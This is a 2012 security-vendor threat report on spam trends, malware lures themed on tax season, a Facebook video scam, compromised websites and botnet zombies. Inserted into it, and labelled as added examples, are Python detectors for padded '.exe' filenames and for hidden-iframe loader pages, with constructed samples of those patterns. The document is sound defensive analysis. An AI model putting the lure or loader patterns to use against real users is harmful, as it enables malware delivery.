Internet Threats Trend Report April 2012 - Alt
Internet Threats Trend Report – April 2012

In This Report
- Is 100 billion the new spam peak? (Page 2)
- Replica spam affiliate program “GlavTorg” closes – no visible effect on spam levels (Page 3)
- Malware attacks focus on US tax season – accountants and customers targeted (Page 5)
- Compromised websites – an owner’s perspective (Page 10)
- Zombie hotspots – global weight shifts away from India again (Page 13)

Q1 2012 Highlights
- 94 billion: average daily spam/phishing emails sent (Page 2)
- Pharmacy ads: most popular spam topic (38.5% of spam) (Page 3)
- 270,000: daily turnover of zombies (Page 12)
- India: country with the most zombies (19.2%) (Page 13)
- Streaming media/downloads: most popular blog topic on user-generated content sites (Page 13)
- Pornography/explicit: website category most likely to contain malware (Page 9)

blog.commtouch.com www.altn.com www.commtouch.com

Overview

Industry and government efforts have dealt a significant blow to spam in the past year. In the first quarter of 2012, an average of 94 billion spam emails were sent per day, compared to over 150 billion per day prior to the Rustock botnet takedown in March 2011. Specific social engineering campaigns of note this quarter focused on the U.S. tax season, targeting both consumers and members of the accounting profession. Facebook remains a popular outlet, with a social engineering campaign featuring “an unwatchable video.”

Spam trends

Spam levels remained low relative to the same period last year. The average decrease compared to Q1 2011 was nearly 40%, with the average daily level dropping to 94 billion spam and phishing emails per day. This decrease followed a marginal increase during the December 2011 holiday season. Spam averaged 75% of all emails sent during the first quarter. A year has now passed since the Rustock botnet takedown that resulted in a significant drop in global spam.
There is no sign of a return to pre-Rustock spam levels. The sustained decrease has been attributed to many additional factors, including: other botnet takedowns, increased prosecution of spammers and of the source industries such as fake pharmaceuticals and replicas, and increased revenues for cybercriminals from other avenues such as banking fraud. At this point it is tempting to conclude that the decade-long growth of spam has been permanently reversed. Time will tell.

[Figure: Spam levels, Dec 2011 to March 2012. Source: Commtouch]
[Figure: Spam as % of all emails, Dec 2011 to March 2012. Source: Commtouch]

Replica spam affiliate program “GlavTorg” closes

Spam affiliate programs provide the link between fake pharmaceutical and replica manufacturers and spammers. GlavTorg was one such program that focused on replica handbags and clothing. In December 2011 GlavTorg announced that it would stop payouts to affiliates at the end of January 2012.

To evaluate the effect of the closure, Commtouch Labs introduced the “spam-subject cloud tool”. The tool samples thousands of spam messages at definable intervals and plots frequently occurring terms in larger text. Spam subjects that have been sent in massive quantities become instantly distinguishable.

[Figure: Spam topics cloud for end-January 2012. Source: Commtouch]

The spam-subject cloud for the end of January shows no evidence of GlavTorg-related products. In addition, the spam levels for the period show no obvious influence (increase or decrease) around the date of the announcement or the date when payments were stopped. Spammers have apparently easily realigned their activities.

The spam cloud for the entire first quarter is shown below. Pharmaceuticals (Viagra, Cialis) and replicas (Rolex, Breitling) clearly lead, with enhancers and software (CS5, Windows, Adobe) also featuring.
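A minimal version of the spam-subject cloud described above, added here as an example and not the Commtouch tool itself: it tokenizes a constructed sample of subject lines, counts each term once per subject so that one long subject cannot dominate, and scales the most frequent terms to a font size the way the cloud plots them larger. The subject lines, the stopword list and the size range are assumptions for illustration.

```python
import re
from collections import Counter

# Constructed sample of spam subject lines standing in for the thousands of
# messages sampled per interval; these are not data from the report.
SAMPLE_SUBJECTS = [
    "Viagra 100mg - 80% off this week",
    "Cheap Cialis & Viagra, fast shipping",
    "Rolex and Breitling replicas, best prices",
    "Replica Rolex watches from $99",
    "Adobe CS5 Master Collection, Windows 7 - 90% off",
    "Your Cialis order has shipped",
    "Hot singles in your area want to meet you",
    "Someone is waiting to meet you tonight",
]

# Assumed stopword list: words that carry no topic and would otherwise dominate the cloud.
STOPWORDS = {"a", "an", "and", "the", "in", "to", "from", "your", "this",
             "has", "is", "off", "you", "of", "for", "with", "on"}


def tokenize(subject):
    """Lower-case, split on non-alphanumerics, drop short words, stopwords and bare numbers."""
    words = re.findall(r"[a-z0-9]+", subject.lower())
    return [w for w in words if len(w) >= 3 and w not in STOPWORDS and not w.isdigit()]


def term_frequencies(subjects):
    """Count in how many subjects each term appears (at most once per subject)."""
    counts = Counter()
    for s in subjects:
        counts.update(dict.fromkeys(tokenize(s), 1))  # dedupe within one subject, keep order
    return counts


def subject_cloud(subjects, top_n=10, min_size=10, max_size=40):
    """Return (term, count, font_size) for the top_n terms; size scales linearly with count."""
    top = term_frequencies(subjects).most_common(top_n)
    if not top:
        return []
    hi, lo = top[0][1], top[-1][1]
    span = (hi - lo) or 1
    return [(t, c, min_size + (c - lo) * (max_size - min_size) // span) for t, c in top]


if __name__ == "__main__":
    for term, count, size in subject_cloud(SAMPLE_SUBJECTS):
        print("%-12s %2d  font-size:%dpx" % (term, count, size))
```

Run on the sample, the four terms that recur across subjects (viagra, cialis, rolex, meet) come out at the largest size and everything else at the smallest, which is exactly the property the report uses: a campaign sent in bulk becomes visible as one oversized word regardless of how the rest of the subject is varied.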
“Dating” subjects also feature but, due to the great variance of subject words, are less prominent.

[Figure: Spam topics cloud for Q1 2012. Source: Commtouch]

Spam topics

Pharmacy spam increased once again, as it did last quarter, to reach nearly 39% of all spam (around 8% more than the previous quarter). Replica-themed spam also increased in the first quarter of the year, by over 5%.

[Figure: Spam topics in Q1 2012. Source: Commtouch]

Spam domains

As part of Commtouch’s analysis of spam trends, Commtouch Labs monitors the domains that are used by spammers in the “from” field of spam emails. The addresses are typically faked in order to give the impression of a reputable, genuine source.

[Figure: Top spoofed “from” domains in Q1 2012. Source: Commtouch]

This quarter, gmail.com is once again the most spoofed domain (rising above 25% for the first time). The top 15 features popular social networking and mail sites (AOL, Yahoo, Facebook, LinkedIn, MySpace) as well as DHL.com, which is often used as part of email malware attacks.

Malware trends

Blended attacks target accountants?

Did cybercriminals target accountants? The scale of a February attack was so large that it certainly must have reached many CPAs – but also many other individuals. Many of the recipients (accountant or not) may have clicked on the links out of sheer curiosity. The attacks included subjects such as:
- fraudulent tax return assistance accusations.
- your accountant license can be revoked.
- your accountant cpa license termination.
- income tax return fraud accusations.

[Figure: Phony accountant tax fraud emails lead to malware. Source: Commtouch]

Clicking on the link downloaded a short HTML page that promises “Page is loading, please wait. You will see tax info on this screen.” In the background, the small script creates a nested iframe which brings in more JavaScript, creating further dynamic content. The process repeats until a large portion of malware code is activated.

Within two weeks a similarly sized attack seemed to again target accounting practitioners and the small business market, this time by describing fictitious purchases of Intuit accounting software. The subjects included:
- Your QuickBooks software order
- Your Intuit.com order
- Your Intuit.com invoice
- Please confirm your Intuit.com invoice

The malware downloaded and deployed in the same way as described above.

[Figure: Phony accounting software email – links lead to malware. Source: Commtouch]

Email malware

Levels of email-attached malware were generally low in the first quarter of 2012. Malware distributors generally stuck to their favorite themes, such as FedEx delivery notices. Several other interesting social engineering techniques were also used during the quarter:
- “Google have received your CV” – with an attached CV submission form
- “Your friend invited you to Twitter” – with an attached “invitation card”
- Someone wanting to be your friend on Hi5 (a social network)
- Shipping updates for your Amazon.com order – with attached “shipping documents”
- American Airlines ticket confirmations
- “I love you” – contains only the text “lovely :-)” and a phony assurance that F-Secure Antivirus has found no virus in the attachment
- Sex pictures – the attached zip refers to www.freeporn4all. Once extracted, a typical Explorer view shows a file named “document.txt”. Widening the filename column reveals the true .exe extension of the malware (following multiple space characters) – an old trick but probably still effective.
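The padded-filename trick above can be caught before a user ever widens the Explorer column, at the gateway or on the endpoint, by inspecting archive member names rather than trusting what the file manager truncates. The following is an added example, not Commtouch’s code or a tool from the report: it builds a constructed zip archive containing a member named like the lure (document.txt, sixty spaces, .exe), then scans member names for that padding, for a document-like inner extension in front of an executable one, and, going one step beyond the page, for the Unicode right-to-left override character that is used for the same purpose. The extension lists, the sample archive and its contents are assumptions for illustration.

```python
import io
import zipfile

# Extensions Windows will execute on double-click (assumed list, not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Extensions that make a name look like a harmless document (assumed list).
DOCUMENT_EXTS = {"txt", "pdf", "doc", "docx", "jpg", "htm", "html"}
RTLO = "\u202e"  # right-to-left override; not in the report, added as a related check


def inspect_member_name(name):
    """Return the reasons an archive member name looks deceptive (empty list if none)."""
    reasons = []
    base = name.rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    ext = "." + ext.lower() if dot else ""
    if ext in EXECUTABLE_EXTS:
        # 'document.txt<many spaces>.exe': the padding pushes the real extension out of view
        if stem != stem.rstrip():
            reasons.append("whitespace padding before executable extension %s" % ext)
        # 'invoice.pdf.exe': a document-looking name in front of the executable extension
        inner = stem.rstrip().rpartition(".")[2].lower()
        if inner in DOCUMENT_EXTS:
            reasons.append("document-like inner extension .%s before %s" % (inner, ext))
    if RTLO in base:
        reasons.append("right-to-left override character in name")
    return reasons


def scan_zip(data):
    """Scan raw zip bytes; return {member_name: [reasons]} for suspicious members only."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = inspect_member_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


# Constructed lure name: what Explorer shows is 'document.txt', the rest is cut off.
LURE_NAME = "document.txt" + " " * 60 + ".exe"


def build_sample_zip():
    """Constructed archive mimicking the 'sex pictures' lure; member contents are dummy bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(LURE_NAME, b"MZ")          # placeholder bytes, not a real executable
        zf.writestr("readme.txt", b"harmless")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_zip()).items():
        print(repr(member))
        for r in why:
            print("   -", r)
```

The scan works on the names stored in the central directory, so it does not need to extract anything; the same checks apply unchanged to attachment names taken straight from a MIME part.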
[Figure: Malware email levels – Jan to Dec 2011. Source: Commtouch]
[Figure: Email with attached malware in Q1 2012. Source: Commtouch]

Top 10 Malware

The table below presents the top 10 most detected malware during the first quarter of 2012, as compiled by Commtouch’s Antivirus Lab.

Top 10 Detected Malware (Source: Commtouch)
1. W32/InstallCore.A2.gen!Eldorado
2. W32/RLPacked.A.gen!Eldorado
3. W32/Sality.C.gen!Eldorado
4. W32/Heuristic-210!Eldorado
5. W32/RAHack.A.gen!Eldorado
6. W32/Sality.gen2
7. W32/HotBar.L.gen!Eldorado
8. W32/Vobfus.AD.gen!Eldorado
9. JS/Pdfka.CI.gen
10. W32/Korgo.V

Web security

Facebook “unwatchable video” scam

Several variants of this scam have appeared on Facebook in the last few months. January’s version starts with a friend’s post that looks something like this:

[Figure: Facebook post describes “unwatchable” video (with link to Blogspot page). Source: Commtouch]

The link takes clickers to a Blogspot page which has been very convincingly designed to look like a Facebook page with an embedded video player (none of the Facebook elements at the top of the page are actually clickable). Visitors are informed that they need the Divx plugin/Youtube Premium plugin.

[Figure: Blogspot page hosts fake video player and malware download. Source: Commtouch]

Clicking on the download link runs a malicious script that performs several actions:

1) A link is posted on the user’s wall. Facebook extracts the content for the post from the page itself, which includes data specifically formatted for this purpose:

    <title>95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds</title>
    <meta property="og:title" content="95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds" />
    <meta property="og:image" content="http://i.imgur.com/0F–s.jpg" />
    <meta property="og:description" content="i dare you to get past the 25 seconds.Just click play" />

2) The script then installs Firefox or Chrome extensions, depending on the browser used. These extensions are used to redirect users to several further scams. The redirections happen no matter what sites the user actually intended to go to. One of the redirections is to a scam offering a $50 Starbucks gift card. After coaxing the Facebook user to like and share the link, they are led to an affiliate marketing site.

[Figure: Phony Starbucks voucher coaxes users to like and share. Source: Commtouch]

Compromised websites store malware

Many of the emails carrying malware links this quarter either hosted the malware on compromised websites or used these as a platform for redirection. An example of one of the attacks is shown below. This is the screen that would be shown to anyone clicking on the links of the “CPA malware” attacks (see page 5).

[Figure: Compromised website used to host malware – message shown on screen while malware loads. Source: Commtouch]

The malware loads in the background while this screen is shown. Meanwhile the host site continues to function normally.
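Both pages in this section hand control to content the visitor never sees: the Blogspot page’s Open Graph tags decide what Facebook writes on the wall, and the compromised site’s “loading” screen keeps the visitor waiting while a hidden iframe, or an iframe written by script, pulls in the next stage. The following is an added example, not code from the report or from Commtouch, that serves both passages: a small static triage pass over a constructed page combining the two patterns. It extracts the og: tags, flags iframes that are tiny or styled invisible, flags scripts that document.write an iframe, and flags digit-for-letter substitutions in the og:title (the “0f” and “F0r” of the real post, a common keyword-filter evasion). The sample page, the example.invalid URLs and the size thresholds are assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed page that combines the two patterns: Open Graph tags Facebook will
# copy into the wall post, and a "loading" screen whose hidden iframe and
# script-written iframe pull further code from another host. Not a real sample.
SAMPLE_PAGE = """<html><head>
<title>95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds</title>
<meta property="og:title" content="95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds" />
<meta property="og:image" content="http://example.invalid/thumb.jpg" />
<meta property="og:description" content="i dare you to get past the 25 seconds.Just click play" />
</head><body>
<p>Page is loading, please wait. You will see tax info on this screen.</p>
<iframe src="http://example.invalid/stage2.html" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://example.invalid/stage3.html%22 width=0 height=0%3E'));</script>
</body></html>
"""


def is_hidden(attrs):
    """Assumed rule: at most 1px in every declared dimension, or styled invisible."""
    dims = [attrs.get("width") or "", attrs.get("height") or ""]
    declared = [d.strip().rstrip("px") for d in dims if d]
    tiny = bool(declared) and all(d.isdigit() and int(d) <= 1 for d in declared)
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def leet_words(text):
    """Words mixing letters with the digits 0/1 ('0f', 'F0r'): a keyword-filter evasion."""
    return re.findall(r"\b(?=\w*[A-Za-z])(?=\w*[01])\w+\b", text)


class PageTriage(HTMLParser):
    def __init__(self):
        super().__init__()
        self.og = {}          # og:* property -> content, what Facebook will post
        self.findings = []    # human-readable reasons the page looks malicious
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("property") or "").startswith("og:"):
            self.og[a["property"]] = a.get("content") or ""
        elif tag == "iframe" and is_hidden(a):
            self.findings.append("hidden iframe -> %s" % (a.get("src") or "?"))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # document.write(...) carrying 'iframe' (even URL-encoded as %3Ciframe) is the
        # nested-iframe loader the report describes for the CPA attack pages.
        if self._in_script and "document.write" in data and "iframe" in data.lower():
            self.findings.append("script writes an iframe at runtime")


def triage(html):
    """Return (og_tags, findings) for one page; findings is empty for a plain page."""
    p = PageTriage()
    p.feed(html)
    p.close()
    substituted = leet_words(p.og.get("og:title", ""))
    if substituted:
        p.findings.append("digit-for-letter substitution in og:title: %s" % ", ".join(substituted))
    return p.og, p.findings


if __name__ == "__main__":
    og, findings = triage(SAMPLE_PAGE)
    for k, v in og.items():
        print("%-15s %s" % (k, v))
    for f in findings:
        print("FLAG:", f)
```

The og: extraction is the same thing Facebook’s crawler does, which is the point: whatever text and image the attacker puts in those tags is what the victim’s friends see, so the preview carries no evidence about the page behind the link. The iframe and document.write checks are coarse on purpose; a real triage pass would also fetch and unwrap each nested stage, since the report notes the loader repeats until the final payload is reached.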
[Figure: Homepage of compromised website used to host malware. Source: Commtouch]

During the first quarter of 2012, Commtouch analyzed which categories of Web sites were most likely to be compromised with malware. Pornographic sites climbed back up to the top spot, pushing down parked domains. As noted in previous reports, the hosting of malware may well be the intention of the owners of the parked domains and pornography sites. A new entry into the top 3 is “Fashion and Beauty” sites.

Website categories infected with malware (Source: Commtouch)
1. Pornography/Sexually Explicit
2. Parked Domains
3. Fashion and Beauty
4. Portals
5. Entertainment
6. Education
7. Health & Medicine
8. Computers & Technology
9. Business
10. Leisure & Recreation

Compromised Websites: An Owner’s Perspective

Having observed the phenomenon of hacked websites for some time, Commtouch, in cooperation with StopBadware, undertook a survey of webmasters whose sites had been compromised. The report presents statistics and opinions on how site owners navigate the process of learning their sites have been hacked and repairing the damage. Data from the poll reveals that malicious actors are often able to compromise legitimate websites without the site owners’ knowledge: over 90% of respondents didn’t notice any strange activity, despite the fact that their sites were being abused to send spam, host phishing pages, or distribute malware. Nearly two-thirds of the webmasters surveyed didn’t know how the compromise had happened. Other highlights from analysis of the survey’s responses include:
- About half of site owners discovered the hack when they attempted to visit their own site and received a browser or search engine warning.
- 26% of site owners had not yet figured out how to resolve the problem at the time they completed the survey.
- 40% of survey respondents changed their opinion of their web hosting provider following a compromise.

In addition to analysis and quotes from site owners, the report provides tips to help webmasters prevent their sites from being compromised. More details, including an infographic and a brief presentation summarizing the report, are available at: http://www.commtouch.com/compromised-websites-report-2012.

Phishing Trends

Phishing attacks target account information for many services: banks, email and social network accounts, and online games. Commtouch’s Security Blog has also featured phishing aimed at Google AdWords customers. In January, a similar phishing attack was directed at Microsoft adCenter users. The links in the email below led to a very convincing replica of the adCenter login page.

[Figure: Microsoft adCenter phishing attack. Source: Commtouch]

During the first quarter of 2012, Commtouch analyzed which categories of legitimate Web sites were most likely to be hiding phishing pages (usually without the knowledge of the site owner). Portals (offering free website hosting) jumped into the highest position. Sites related to games (the previous leader) dropped off the list.

Website categories infected with phishing (Source: Commtouch)
1. Portals
2. Shopping
3. Fashion & Beauty
4. Education
5. Business
6. Sports
7. Leisure & Recreation
8. Health and Medicine
9. Real Estate
10. Personal Sites

Zombie trends

The first quarter saw an average turnover of 270,000 zombies each day that were newly activated for sending spam. This number is an increase over the 209,000 of the fourth quarter of 2011. The large drop at the start of November appears to be a result of the Esthost botnet takedown. Although this botnet was primarily used for DNS changing (redirecting Web requests to malicious sites), it appears that some portion was also used to send spam. Spammers have worked to source new zombies since the start of 2012.

[Figure: Daily newly activated spam zombies, Oct 2011 to Mar 2012. Source: Commtouch]

Zombie Hot Spots

India again claimed the top zombie producer title, but dropped below 20% from nearly 24% in Q4 2011. Brazil and the Russian Federation both climbed back up to the 2nd and 3rd positions. Argentina, Poland and Italy joined the top 15, displacing the United States, Romania and Ukraine.

[Figure: Worldwide zombie distribution in Q1 2012. Source: Commtouch]

Web 2.0 trends

Commtouch’s GlobalView Cloud tracks billions of Web browsing sessions and URL requests, and its Web Filtering service includes highly granular categorization of Web 2.0 content. In addition to filtering accuracy, this provides insight into the most popular user-generated content sites. Once again, “streaming media and downloads” was the most popular blog or page topic, staying at 22%. The streaming media & downloads category includes sites with MP3 files or music-related sites such as fan pages.

Most popular categories of user-generated content (Source: Commtouch)
 1. Streaming Media & Downloads    22%
 2. Computers & Technology          8%
 3. Entertainment                   7%
 4. Pornography/Sexually Explicit   5%
 5. Restaurants & Dining            5%
 6. Fashion & Beauty                5%
 7. Arts                            5%
 8. Religion                        5%
 9. Sports                          4%
10. Education                       4%
11. Leisure & Recreation            3%
12. Health & Medicine               3%
13. Games                           3%
14. Sex Education                   2%
About Commtouch

Commtouch® (NASDAQ: CTCH) safeguards the world’s leading security companies and service providers with cloud-based Internet security services. Real-time threat intelligence from Commtouch’s GlobalView™ Cloud powers Web security, email security and antivirus solutions, protecting thousands of organizations and hundreds of millions of users worldwide. Commtouch’s GlobalView™ and patented Recurrent Pattern Detection™ (RPD™) technologies are founded on a unique cloud-based approach, and work together in a comprehensive feedback loop to protect effectively in all languages and formats. Commtouch’s Command Antivirus utilizes a multi-layered approach to provide award-winning malware detection and industry-leading performance. Commtouch technology automatically analyzes billions of Internet transactions in real time in its global data centers to identify new threats as they are initiated, enabling partners and customers to protect end users from spam and malware and enabling safe, compliant browsing. Commtouch was founded in 1991, is headquartered in Netanya, Israel, and has a subsidiary with offices in Sunnyvale, California and Palm Beach Gardens, Florida.

About Alt-N Technologies

Alt-N Technologies develops affordable and secure messaging and collaboration solutions designed for, and trusted by, small-to-medium businesses in over 90 countries and 25 languages. The company’s flagship solutions, the MDaemon® Messaging Server and SecurityGateway for Exchange/SMTP Servers, install in minutes, include the latest email security technologies, and require minimal support and administration to operate and maintain. The company uses a network of global distributors and resellers for the sales and support of its products.

Notes

- Reported global spam levels are based on Internet email traffic as measured from unfiltered data streams, not including internal corporate traffic. Therefore global spam levels will differ from the quantities reaching end user inboxes, due to several possible layers of filtering.
- Spam levels do not include emails with attached malware.

Visit us: www.commtouch.com and blog.commtouch.com. Email us: [email protected]. Call us: 650 864 2000 (US) or +972 9 863 6888 (International). Alt-N Technologies: www.AltN.com, Phone: 866-601-ALTN (2586).

© 2012 Commtouch Software Ltd. Recurrent Pattern Detection, RPD, Zero-Hour and GlobalView are trademarks, and Commtouch, Authentium, Command Antivirus and Command Anti-malware are registered trademarks, of Commtouch. U.S. Patent No. 6,330,590 is owned by Commtouch. © 1996-2012 Alt-N Technologies, Ltd. MDaemon, WorldClient, RelayFax, and Alt-N are trademarks of Alt-N Technologies, Ltd. All trademarks are property of their respective owners. 04.17.2012